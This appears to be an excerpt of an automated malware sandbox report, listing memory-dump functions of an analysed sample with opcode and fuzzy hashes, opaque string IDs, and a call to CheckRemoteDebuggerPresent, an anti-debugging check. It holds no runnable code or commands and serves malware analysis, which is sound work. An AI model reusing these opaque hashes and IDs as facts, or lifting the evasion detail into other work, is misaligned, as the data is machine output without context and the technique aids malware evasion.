                        Uniqueness Score: -1.00%

                        Function 0144B933 Relevance: 4.1, Strings: 3, Instructions: 365COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721390656.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1440000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID: ,8,d$\s]q$PS7
                        • API String ID: 0-94456105
                        • Opcode ID: a7a3560434906943a641f3d51bb1517036c6fdaa0e1f774a5fd052b71a3c52c1
                        • Instruction ID: 16f6fd21af6b1bff565576fbfc79555bba6e66f53b59e9581346b871adeef308
                        • Opcode Fuzzy Hash: a7a3560434906943a641f3d51bb1517036c6fdaa0e1f774a5fd052b71a3c52c1
                        • Instruction Fuzzy Hash: B5D19136B002159FD754DF6DD8846AEBBE2FF88320F15856EE949EB364DA30DC058B81
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02DD6DA0 Relevance: 4.1, Strings: 3, Instructions: 349COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID: 1Df$Lud.$Ax#
                        • API String ID: 0-882355127
                        • Opcode ID: 0538e0ae0f5072ddd366bc3df3a266fc6b5a4c485fc75a944869aad84dedf49a
                        • Instruction ID: 7c4322faa8352f5d39b8a69045aa07cd657fb555b4f112a5251f804a8bb37217
                        • Opcode Fuzzy Hash: 0538e0ae0f5072ddd366bc3df3a266fc6b5a4c485fc75a944869aad84dedf49a
                        • Instruction Fuzzy Hash: A6C1A272F105298BDB18CFADD88059EFBF7AB8831075AC5AAE815EB345D634DC458BC0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02DD5DF8 Relevance: 4.0, Strings: 3, Instructions: 299COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID: @$_<]B$*ov
                        • API String ID: 0-391430726
                        • Opcode ID: e3303588a17a581cd06c06c0d34cc75a95aa49bd2130ef712a5fb57d750fe465
                        • Instruction ID: 9de858903722f95fcecf048d7b67b4ac8090f5c1e8144700b86d3d54f9373b2b
                        • Opcode Fuzzy Hash: e3303588a17a581cd06c06c0d34cc75a95aa49bd2130ef712a5fb57d750fe465
                        • Instruction Fuzzy Hash: CB812831B106268FCB44DF7DD8846AEBBF6BF9921070984AAE859DB351DB30DC05CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02DD3597 Relevance: 4.0, Strings: 3, Instructions: 276COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID: =*dR$bay|$zozG
                        • API String ID: 0-744661480
                        • Opcode ID: 6ddcb8e327ba88e9162797efdbbc4d0779e508f4e3796e658bcadfdfb197a47c
                        • Instruction ID: 21f9f7e85b724956cb2e9491fdfca599cb2e33012c30840c34f0b5aa044a353d
                        • Opcode Fuzzy Hash: 6ddcb8e327ba88e9162797efdbbc4d0779e508f4e3796e658bcadfdfb197a47c
                        • Instruction Fuzzy Hash: 0D91A371B087918FC354CE2DC84465ABBE1BFC9650F0689ADE889DB361DA34DC04CF92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0144CA01 Relevance: 4.0, Strings: 3, Instructions: 257COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721390656.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1440000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID: Wl9^$>3n$qzQ
                        • API String ID: 0-3979148012
                        • Opcode ID: 4edef0dee781b6981f66111ab388d1fefaa50fda080d129afaff03ebb1258091
                        • Instruction ID: 544cc227574c6953db4d0ee2089a47f0e9de5b7537b9abe88545e74213e84fad
                        • Opcode Fuzzy Hash: 4edef0dee781b6981f66111ab388d1fefaa50fda080d129afaff03ebb1258091
                        • Instruction Fuzzy Hash: 4AB16E75E002199FEB5CDFAAD8D46AEB7B1AF94315F04806AE526EB370DE309845CF40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02DD617E Relevance: 3.9, Strings: 3, Instructions: 169COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID: _<]B$}Tn\$*ov
                        • API String ID: 0-2845494251
                        • Opcode ID: a357b03890d9c8ab43734e582efea76068e4c9973d7746df6fcee1a324d50ad5
                        • Instruction ID: 931ddf9a925d160a42301472c62f1066319f0d56a1fde2e8ac37421580559cdb
                        • Opcode Fuzzy Hash: a357b03890d9c8ab43734e582efea76068e4c9973d7746df6fcee1a324d50ad5
                        • Instruction Fuzzy Hash: FA51B475F105258FCB14DF7DE48456DBBF6BF8864074A80AAE816DB364DA30DD11CB80
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0144F80F Relevance: 3.0, Strings: 2, Instructions: 470COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721390656.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1440000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID: i:N8$Q}"
                        • API String ID: 0-4233569407
                        • Opcode ID: 9c3184897717d694cfd0b4848fa56f52c51de0fdd64d92f3efe8ca207e9ec253
                        • Instruction ID: 21d1905d0ea5f5d892661e16d3d7971423dacaf441318e051995d1b6e989b106
                        • Opcode Fuzzy Hash: 9c3184897717d694cfd0b4848fa56f52c51de0fdd64d92f3efe8ca207e9ec253
                        • Instruction Fuzzy Hash: 00F1D276B146218FE714CE2DC88051BB7E2BF98650B464A6FF895DB370EA71DC05CB82
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02DD2E08 Relevance: 2.8, Strings: 2, Instructions: 264COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID: E&$"ByG
                        • API String ID: 0-3030847990
                        • Opcode ID: 4b8664db5269171df3397b1cebd09a7dd2b65b2a153f14b47992e666ce7e8a62
                        • Instruction ID: 397c73f3416a2ae87d4f8350b6e50f3396cc1656c49d3bda368d03283aef1671
                        • Opcode Fuzzy Hash: 4b8664db5269171df3397b1cebd09a7dd2b65b2a153f14b47992e666ce7e8a62
                        • Instruction Fuzzy Hash: 6791D476F046258FC755CF78C854499BBF2BF89320B1A85AAD845EB361DB34DC41CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02DD3380 Relevance: 2.7, Strings: 2, Instructions: 232COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID: bay|$~"
                        • API String ID: 0-3683321486
                        • Opcode ID: 4c7136d72a18ccc3eb151134933bafff2621542b15868fad272a6f79cf9c7a8d
                        • Instruction ID: 630727bd894199f68cb745463030c53bf583b80c6cc5c40fa1e7e8163bc2fd91
                        • Opcode Fuzzy Hash: 4c7136d72a18ccc3eb151134933bafff2621542b15868fad272a6f79cf9c7a8d
                        • Instruction Fuzzy Hash: 9771B672A087618FD354CF3DC84465AB7E1BB85250F0689AEE899DB361DA34DC05CB92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02DD5FD5 Relevance: 2.7, Strings: 2, Instructions: 175COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID: _<]B$*ov
                        • API String ID: 0-3575464964
                        • Opcode ID: 29679706697a2e9339a854f1f38347640d2cbd1a127b73b1cbf5201d0cdbca8f
                        • Instruction ID: 9f15737a61cb15cf32fd507a14d0cb4270e5f32305b4b9929cf57a7855675a24
                        • Opcode Fuzzy Hash: 29679706697a2e9339a854f1f38347640d2cbd1a127b73b1cbf5201d0cdbca8f
                        • Instruction Fuzzy Hash: 1351D176F005259FDB18DFA9D8409AEBBFAFF88640759406AE805EB360E731CD10CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02DD3BC9 Relevance: 1.6, Strings: 1, Instructions: 356COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID: bay|
                        • API String ID: 0-1580252715
                        • Opcode ID: 19d75963d4ab24087b11ad5b199e2a192efbca4a0a3bb46230f748ac2b3ee466
                        • Instruction ID: 2171a06ec14db425348a05bf279e51f87cc54db5e539987e19db69679b92debd
                        • Opcode Fuzzy Hash: 19d75963d4ab24087b11ad5b199e2a192efbca4a0a3bb46230f748ac2b3ee466
                        • Instruction Fuzzy Hash: BAC18072A087518FC364CE3DC94465AB7E1BF89610F0689AEE899DB364DB30DC05CF92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02DD3995 Relevance: 1.6, Strings: 1, Instructions: 310COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID: bay|
                        • API String ID: 0-1580252715
                        • Opcode ID: 6a6a3181aafbb2306e926e4f04dcfbaea3447b74eb58bfcc182e5f41b5c690ce
                        • Instruction ID: 3909ef280b92ab63e84a9a98f75b281bcc1995dcf0559d1bbf4879827e88350f
                        • Opcode Fuzzy Hash: 6a6a3181aafbb2306e926e4f04dcfbaea3447b74eb58bfcc182e5f41b5c690ce
                        • Instruction Fuzzy Hash: 22A1C572B087518FC794CF6DC84465ABBE2BF89254F0649ADE899DB361DA30DC04CF92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02DD5718 Relevance: 1.4, Strings: 1, Instructions: 162COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID: JZo+
                        • API String ID: 0-4196352523
                        • Opcode ID: 776e280f96124377b71609afd4733e7aa7b2a11e1b81228edf3ca29e93f34d94
                        • Instruction ID: dca30bf32499b5abe19fccf62aede691367539cb331b9fcf59655b56f1563280
                        • Opcode Fuzzy Hash: 776e280f96124377b71609afd4733e7aa7b2a11e1b81228edf3ca29e93f34d94
                        • Instruction Fuzzy Hash: F0512877F005254F8B54DBA9D8844AEB7E6FFD9260726816BD909E7361DA308C06C7D0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02DD2DF8 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID: E&
                        • API String ID: 0-3842363111
                        • Opcode ID: 1c8fb0de1a52f35676876750ad6fd48c80c5e20425a4fce03355a183e4152ceb
                        • Instruction ID: 493cb27786dc0b6b38f37d9293e016ff9e6000e3a90c5f691f0701206664a8c1
                        • Opcode Fuzzy Hash: 1c8fb0de1a52f35676876750ad6fd48c80c5e20425a4fce03355a183e4152ceb
                        • Instruction Fuzzy Hash: 1F417276F106258FCB48DF69C845999B7F2BF88320B1681AAD819EB361DB34DC51CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02DDBA50 Relevance: .3, Instructions: 315COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ac6c8e5808b92ab16f9afc8550c376c9740276de4f7d1e07293ce4ff5999ae6b
                        • Instruction ID: 9bca1b91de4ee98b2f6b939f8cc61c513b6d4ff5411f9763d8032e15cf7854d2
                        • Opcode Fuzzy Hash: ac6c8e5808b92ab16f9afc8550c376c9740276de4f7d1e07293ce4ff5999ae6b
                        • Instruction Fuzzy Hash: 0312E5B0C817468BE334CF25E848184BBE0F7A5318B564B19D2A16B3D1D7B5396ECF85
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 09ACB048 Relevance: .3, Instructions: 264COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2723946514.0000000009AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_9ac0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2d4a93ad67981d786b2a8ecac0bee20dfa17469c733bc40c474b89d1559a799a
                        • Instruction ID: 282ba6c582e11e2f1d6e0145a8b0c6b1864d3f710b47e2d376fbcecde3ab6de5
                        • Opcode Fuzzy Hash: 2d4a93ad67981d786b2a8ecac0bee20dfa17469c733bc40c474b89d1559a799a
                        • Instruction Fuzzy Hash: 8EA17D72A00209CFCF09DFB5C98559EB7B6FF84701B15856EE811AF261EB32E915CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0144E62A Relevance: .2, Instructions: 237COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721390656.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1440000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1db909661eb682c67ae9cc47b3ec73a5223d0b98c0ecfaf427f882c2d1243db1
                        • Instruction ID: 79a750e789d144e01b4b3502e5bb291e6e080ff87c3425b3000ab5d98f7377d1
                        • Opcode Fuzzy Hash: 1db909661eb682c67ae9cc47b3ec73a5223d0b98c0ecfaf427f882c2d1243db1
                        • Instruction Fuzzy Hash: A7713476B001148FEB59EB6C985447EBBF2FF99220B1604BFE506E73B2DA348D058791
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0144B318 Relevance: .2, Instructions: 226COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721390656.0000000001440000.00000040.00000800.00020000.00000000.sdmp, Offset: 01440000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1440000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 84aef5ed07b36bee95ffa6fafb0e0ca7ad560bc1c30520791a0da1b205586886
                        • Instruction ID: 459127d6558ba3f41a7b0e29f809a6ad64a6cdaf1156b30c6138f03742e7f3c4
                        • Opcode Fuzzy Hash: 84aef5ed07b36bee95ffa6fafb0e0ca7ad560bc1c30520791a0da1b205586886
                        • Instruction Fuzzy Hash: 2E6136A3F1073547BB24886D8C9026BE6D1D75468879B0537EE0AFB361F9B1CC0587D1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02DDBA40 Relevance: .2, Instructions: 220COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2e61e003da52bb41d5c2f4701fdb779b12998a66236e98490db2e5ac2685ad5d
                        • Instruction ID: d7bce3d300976999ac66b07d29a5c946e42092f67436a1c7d34444d4dc71d12a
                        • Opcode Fuzzy Hash: 2e61e003da52bb41d5c2f4701fdb779b12998a66236e98490db2e5ac2685ad5d
                        • Instruction Fuzzy Hash: 1CC128B0C817468BE724CF25E848189BBB1FBA5318B164B19D2A16B3D1D7B4386ECF45
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02DD6D90 Relevance: .1, Instructions: 147COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2721595987.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2dd0000_#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U0.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0cbf695edc01cc1d87f9cf689211b4a1d3b9716643a80d547b7ac6c6c0f1d11a
                        • Instruction ID: 111be42b9c00c4559490d376ea6c2ac79dfb654676263991e3ed61f365b771c7
                        • Opcode Fuzzy Hash: 0cbf695edc01cc1d87f9cf689211b4a1d3b9716643a80d547b7ac6c6c0f1d11a
                        • Instruction Fuzzy Hash: 0F51C572F006398BDB14DEADD48059EFBF6BB88350716856AE859EB340DA70DD05CBC0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Execution Graph

                        Execution Coverage:10.2%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:0%
                        Total number of Nodes:3
                        Total number of Limit Nodes:0
                        execution_graph 3813 7ff848357e31 3814 7ff848357e7e CheckRemoteDebuggerPresent 3813->3814 3816 7ff848357eef 3814->3816

                        Executed Functions

                        Function 00007FF848357E31 Relevance: 1.6, APIs: 1, Instructions: 125COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1017 7ff848357e31-7ff848357eed CheckRemoteDebuggerPresent 1020 7ff848357eef 1017->1020 1021 7ff848357ef5-7ff848357f38 1017->1021 1020->1021
                        APIs
                        Memory Dump Source
                        • Source File: 00000002.00000002.3241041169.00007FF848350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848350000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_7ff848350000_fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.jbxd
                        Similarity
                        • API ID: CheckDebuggerPresentRemote
                        • String ID:
                        • API String ID: 3662101638-0
                        • Opcode ID: 9964022e1362b9f4274dac7ef7697e867b1e22ffd6051e812419b81de611dcb6
                        • Instruction ID: 8a2a3f29b2aa406d5fb08982321434321ba6cccb4f097c86f8ab446fb0634de5
                        • Opcode Fuzzy Hash: 9964022e1362b9f4274dac7ef7697e867b1e22ffd6051e812419b81de611dcb6
                        • Instruction Fuzzy Hash: E731223190871C8FCB58DF58C88A7ED7BE0EF65321F0542ABD489D7292DB74A846CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Executed Functions

                        Function 00007FF848370715 Relevance: 3.7, Strings: 2, Instructions: 1237COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000007.00000002.2184494585.00007FF848370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848370000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ff848370000_fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.jbxd
                        Similarity
                        • API ID:
                        • String ID: M_^$M_^
                        • API String ID: 0-615062493
                        • Opcode ID: bfae76d42550f169ebd24105660dc88ae3e5f16c9e70002c49bd28b24acda257
                        • Instruction ID: c1443cb9e2a6ceb48c9e159a44db3a36b132420a09edc474fe2ea525f6050fa6
                        • Opcode Fuzzy Hash: bfae76d42550f169ebd24105660dc88ae3e5f16c9e70002c49bd28b24acda257
                        • Instruction Fuzzy Hash: ABC2E375E092698FDB68DF58D8917ECB7B1EB48344F1481EAD40EA7381DB34AE818F44
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF8483707E0 Relevance: .6, Instructions: 552COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.2184494585.00007FF848370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848370000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ff848370000_fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 95a88e2fda7a271a9a6b442856059194f47df50548424e8eaf14f1af14cc8926
                        • Instruction ID: bb0c877c7ba34fb2b9756c6856de166d721afcfb26d6c5ebba99113c4c4a422f
                        • Opcode Fuzzy Hash: 95a88e2fda7a271a9a6b442856059194f47df50548424e8eaf14f1af14cc8926
                        • Instruction Fuzzy Hash: E232D574E192198FDB68DF68C8917EDB7B1EF48344F1481A9E50EA7381DB34AE818F44
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF848371ADA Relevance: .5, Instructions: 522COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.2184494585.00007FF848370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848370000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ff848370000_fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e83b6491833518580557890e3372d2ec1f01a234268462029460e009ca58e603
                        • Instruction ID: 323ad5dc0052c473fad0cb52905b12ae1b0c2e53ae890ff4c27a39d3960afd5c
                        • Opcode Fuzzy Hash: e83b6491833518580557890e3372d2ec1f01a234268462029460e009ca58e603
                        • Instruction Fuzzy Hash: 9E029031B1C90A4FE758EB28D46567D73D2EF88784F688579D10EC32D6CE78AC428745
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF8483721A3 Relevance: .1, Instructions: 108COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.2184494585.00007FF848370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848370000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ff848370000_fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b976a243492f459debf8a1cba953c18d0260a3582a26b96f0e89ad1406a11edc
                        • Instruction ID: 2806168a4fde356dcb32f567a3daf24eec9306a3f87efb06bc7d6c60db7ec6d7
                        • Opcode Fuzzy Hash: b976a243492f459debf8a1cba953c18d0260a3582a26b96f0e89ad1406a11edc
                        • Instruction Fuzzy Hash: 4331463294D2850FD755A7306C138E63FA4EB42368F0A41ABE459CB4A3DA1CD687C762
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF8483721E5 Relevance: .1, Instructions: 95COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.2184494585.00007FF848370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848370000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ff848370000_fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ccb4ad689c4b5ef6eba2dc954244c44a0fbb4cf415d94e7ab9498e91deeed9a6
                        • Instruction ID: 63eb32c4ec9a500e55b51514890ad64608c8fa37e1db08ee434dcc02694a4a69
                        • Opcode Fuzzy Hash: ccb4ad689c4b5ef6eba2dc954244c44a0fbb4cf415d94e7ab9498e91deeed9a6
                        • Instruction Fuzzy Hash: 7621F97288E2911FD356A3306C538F23FA4CF42269B0E41E7E099CB4A3D50D9687C766
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF8483719A0 Relevance: .1, Instructions: 88COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000007.00000002.2184494585.00007FF848370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848370000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_7_2_7ff848370000_fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1fad236ba2ae7130faa91d4faabfbe8f16482181205728f7746925755daa1601
                        • Instruction ID: 21620ae34b4e060c5a08d4d1d3e6d9d94ea4cfdf4a6452ddeda710b210e5f7bb
                        • Opcode Fuzzy Hash: 1fad236ba2ae7130faa91d4faabfbe8f16482181205728f7746925755daa1601
                        • Instruction Fuzzy Hash: 4B214C32E1D98E8FEB84FB68D8611FDBBB1EF54354F4441B6D409E3292DE2858419784
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Executed Functions

                        Function 00007FF848370715 Relevance: 3.7, Strings: 2, Instructions: 1237COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000008.00000002.2347155550.00007FF848370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848370000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_7ff848370000_fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.jbxd
                        Similarity
                        • API ID:
                        • String ID: M_^$M_^
                        • API String ID: 0-615062493
                        • Opcode ID: 9ec1ff7acbdbf45e7f5524f02203b377397f5bc824049017d57c98f49d875976
                        • Instruction ID: 26191d8ae96a8a3a2d0fafddbf17115dc6991036af7395f7e34d5713c03f4f55
                        • Opcode Fuzzy Hash: 9ec1ff7acbdbf45e7f5524f02203b377397f5bc824049017d57c98f49d875976
